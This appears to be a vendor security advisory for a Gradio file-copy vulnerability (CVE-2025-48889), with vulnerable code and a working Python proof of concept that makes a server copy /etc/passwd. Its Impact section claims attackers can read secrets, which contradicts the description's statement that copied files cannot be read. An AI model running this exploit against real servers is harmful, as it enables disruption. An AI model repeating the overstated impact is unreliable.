Gecko will be at Black Hat and DEFCON in Las Vegas

Back to Research
CVSS 5.3mediumCVE-2025-48889

CVE-2025-48889: Gradio Unauthorized File Copy via Path Manipulation

Arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem.

Gecko Security Research
Gecko Security Team
1/15/2025

Description

An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space.

The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the /gradio_api/run/predict endpoint to trigger these file copies.

Source - Sink Analysis

Source: User-controlled path parameter in the flagging functionality JSON payload
Sink: shutil.copy operation in FileData._copy_to_dir() method

The vulnerable code flow:

  1. A JSON payload is sent to the /gradio_api/run/predict endpoint
  2. The path field within FileData object can reference any file on the system
  3. When processing this request, the Component.flag() method creates a GradioDataModel object
  4. The FileData._copy_to_dir() method uses this path without proper validation:
def _copy_to_dir(self, dir: str) -> FileData:
    pathlib.Path(dir).mkdir(exist_ok=True)
    new_obj = dict(self)

    if not self.path:
        raise ValueError("Source file path is not set")
    new_name = shutil.copy(self.path, dir)  # vulnerable sink
    new_obj["path"] = new_name
    return self.__class__(**new_obj)
  1. The lack of validation allows copying any file the Gradio process can read

Proof of Concept

The following script demonstrates the vulnerability by copying /etc/passwd from the server to Gradio's flagged directory:

Setup a Gradio app:

import gradio as gr

def image_classifier(inp):
    return {'cat': 0.2, 'dog': 0.8}

test = gr.Interface(fn=image_classifier, inputs="image", outputs="label")

test.launch(share=True)

Run the PoC:

import requests

url = "https://[your-gradio-app-url]/gradio_api/run/predict"  
headers = {
    "Content-Type": "application/json",  
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" 
}

payload = {
    "data": [
        {
            "path": "/etc/passwd",  
            "url": "[your-gradio-app-url]",
            "orig_name": "network_config", 
            "size": 5000,  
            "mime_type": "text/plain", 
            "meta": {
                "_type": "gradio.FileData"  
            }
        },
        {}  
    ],
    "event_data": None,
    "fn_index": 4, 
    "trigger_id": 11, 
    "session_hash": "test123"  
}

response = requests.post(url, headers=headers, json=payload)
print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")

Impact

The vulnerability has severe security implications:

  • Attackers can access sensitive system files (/etc/passwd, /etc/shadow, etc.), configuration files containing credentials and API keys, database connection strings, and private SSH keys.
  • Internal application details, proprietary code, and business logic can be exposed, leading to intellectual property theft.
  • Information gathered through this could facilitate further attacks by revealing user accounts, configuration details, and security implementations.
  • Attackers can exploit this vulnerability to target large system files (e.g., /dev/zero or /dev/urandom) or critical system files, potentially causing the application to crash or become unresponsive due to resource exhaustion.
  • If the application processes or stores sensitive user information, this vulnerability could lead to unauthorized access to this data, potentially violating data protection requirements.